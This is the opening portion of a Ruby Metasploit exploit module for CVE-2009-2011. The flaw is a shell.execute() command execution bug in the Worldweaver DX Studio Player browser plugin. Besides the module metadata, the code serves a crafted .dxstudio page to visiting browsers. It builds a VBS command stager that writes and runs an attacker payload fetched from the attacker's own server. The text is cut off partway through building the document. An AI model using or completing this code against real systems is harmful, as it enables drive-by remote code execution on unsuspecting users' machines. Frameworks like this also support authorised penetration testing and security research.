##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Worldweaver DX Studio Player shell.execute() Command Execution',
'Description' => %q{
This module exploits a command execution vulnerability within the DX
Studio Player from Worldweaver for versions 3.0.29 and earlier. The
player is a browser plugin for IE (ActiveX) and Firefox (dll). When an
unsuspecting user visits a web page referring to a specially crafted
.dxstudio document, an attacker can execute arbitrary commands.
Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20
and IE 6 on Windows XP SP3. In IE, the user will be prompted if they
wish to allow the plug-in to access local files. This prompt appears to
occur only once per server host.
NOTE: This exploit uses additionally dangerous script features to write
to local files!
},
'License' => MSF_LICENSE,
'Author' => [ 'jduck' ],
'References' =>
[
[ 'CVE', '2009-2011' ],
[ 'BID', '35273' ],
[ 'OSVDB', '54969' ],
[ 'EDB', '8922' ],
[ 'URL', 'http://dxstudio.com/guide.aspx' ]
],
'Payload' =>
{
'Space' => 2048,
},
'Platform' => 'win',
# 'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Automatic', { } ],
],
'CmdStagerFlavor' => 'vbs',
'DisclosureDate' => 'Jun 09 2009',
'DefaultTarget' => 0))
end
def on_request_uri(cli, request)
url_base = "http://"
url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
payload_url = url_base + "/payload"
# handle request for the payload
if (request.uri.match(/payload/))
# build the payload
return if ((p = regenerate_payload(cli)) == nil)
cmds = generate_cmdstager({:linemax => 2047}, p)
scr = ""
cmds.each { |ln|
scr << "f.writeString('"
scr << ln
scr << "\\n');\n"
}
# make header.xml
hdrxml = %Q|